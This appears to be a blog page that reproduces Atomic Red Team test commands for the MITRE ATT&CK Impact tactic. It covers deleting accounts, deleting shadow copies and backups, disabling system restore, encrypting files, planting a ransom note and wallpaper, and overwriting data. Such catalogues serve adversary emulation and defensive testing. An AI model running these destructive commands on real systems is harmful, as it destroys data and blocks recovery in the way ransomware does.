Account Access Removal
System Shutdown/Reboot
Resource Hijacking
Defacement: Internal Defacement
Inhibit System Recovery
Service Stop
Data Encrypted for Impact
Data Destruction
T1531
Account Access Removal
Change User Password - Windows
| net user #{user_account} #{new_user_password} /add |
| net.exe user #{user_account} #{new_password} |
Delete User - Windows
| net user #{user_account} #{new_user_password} /add |
| net.exe user #{user_account} /delete |
Remove Account From Domain Admin Group
| $PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force |
| $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord |
| if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Admins*"){ |
| Remove-ADGroupMember -Identity "Domain Admins" -Members #{remove_user} -Credential $Credential -Confirm:$False |
| } else{ |
| write-host "Error - Make sure #{remove_user} is in the domain admins group" -foregroundcolor Red |
| } |
Change User Password via passwd
| passwd #{user_account} #enter admin password > enter new password > confirm new password |
Delete User via dscl utility
| dscl . -delete /Users/#{user_account} #enter admin password |
Delete User via sysadminctl utility
| sysadminctl -deleteUser #{user_account} #enter admin password |
Azure AD - Delete user via Azure AD PowerShell
| Connect-AzureAD |
| $userprincipalname = "#{userprincipalname}" |
| Remove-AzureADUser -ObjectId $userprincipalname |
Azure AD - Delete user via Azure CLI
| az login |
| $userprincipalname = "#{userprincipalname}" |
| az ad user delete --id $userprincipalname |
T1529
System Shutdown/Reboot
Shutdown System - Windows
| shutdown /s /t #{timeout} |
Restart System - Windows
| shutdown /r /t #{timeout} |
Restart System via shutdown - macOS/Linux
Shutdown System via shutdown - macOS/Linux
Restart System via reboot - macOS/Linux
Shutdown System via halt - Linux
Reboot System via halt - Linux
Shutdown System via poweroff - Linux
Reboot System via poweroff - Linux
Logoff System - Windows
T1496
Resource Hijacking
macOS/Linux - Simulate CPU Load with Yes
T1491.001
Defacement: Internal Defacement
Replace Desktop Wallpaper
| $url = "#{url_of_wallpaper}" |
| $imgLocation = "#{wallpaper_location}" |
| $orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper |
| $orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}" |
| $updateWallpapercode = @' |
| using System.Runtime.InteropServices; |
| namespace Win32{ |
| |
| public class Wallpaper{ |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] |
| static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; |
| |
| public static void SetWallpaper(string thePath){ |
| SystemParametersInfo(20,0,thePath,3); |
| } |
| } |
| } |
| '@ |
| $wc = New-Object System.Net.WebClient |
| try{ |
| $wc.DownloadFile($url, $imgLocation) |
| add-type $updateWallpapercode |
| [Win32.Wallpaper]::SetWallpaper($imgLocation) |
| } |
| catch [System.Net.WebException]{ |
| Write-Host("Cannot download $url") |
| add-type $updateWallpapercode |
| [Win32.Wallpaper]::SetWallpaper($imgLocation) |
| } |
| finally{ |
| $wc.Dispose() |
| } |
Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
| $orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption |
| $orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText |
| $newLegalNoticeCaption = "#{legal_notice_caption}" |
| $newLegalNoticeText = "#{legal_notice_text}" |
| Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force |
| Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force |
T1490
Inhibit System Recovery
Windows - Delete Volume Shadow Copies
| vssadmin.exe delete shadows /all /quiet |
Windows - Delete Volume Shadow Copies via WMI
| wmic.exe shadowcopy delete |
Windows - wbadmin Delete Windows Backup Catalog
| wbadmin delete catalog -quiet |
Windows - Disable Windows Recovery Console Repair
| bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
| bcdedit.exe /set {default} recoveryenabled no |
Windows - Delete Volume Shadow Copies via WMI with PowerShell
| Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} |
Windows - Delete Backup Files
| del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk |
Windows - wbadmin Delete systemstatebackup
| wbadmin delete systemstatebackup -keepVersions:0 |
Windows - Disable the SR scheduled task
| schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable |
Disable System Restore Through Registry
| reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f |
| reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f |
T1489
Service Stop
Windows - Stop service using Service Controller
| sc.exe stop #{service_name} |
Windows - Stop service using net.exe
| net.exe stop #{service_name} |
Windows - Stop service by killing process
| taskkill.exe /f /im #{process_name} |
T1486
Data Encrypted for Impact
Encrypt files using gpg (Linux)
| echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} |
Encrypt files using 7z (Linux)
| $which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path} |
Encrypt files using ccrypt (Linux)
| if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi |
Encrypt files using openssl (Linux)
| $which_openssl genrsa -out #{private_key_path} #{encryption_bit_size} |
| $which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path} |
| $which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path} |
PureLocker Ransom Note
| echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt |
Encrypt files using 7z utility - macOS
| 7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path} |
Encrypt files using openssl utility - macOS
| openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name} |
Data Encrypted with GPG4Win
| cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}' |
T1485
Data Destruction
Windows - Overwrite file with Sysinternals SDelete
| if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force } |
| Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" |
macOS/Linux - Overwrite file with DD
| dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes |
Overwrite deleted data on C drive
GCP - Delete Bucket
| gcloud config set project #{project_id} |
| gcloud storage buckets delete gs: |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
2022-06-28 《数据安全实践指南》- 通用安全实践-数据安全策略规划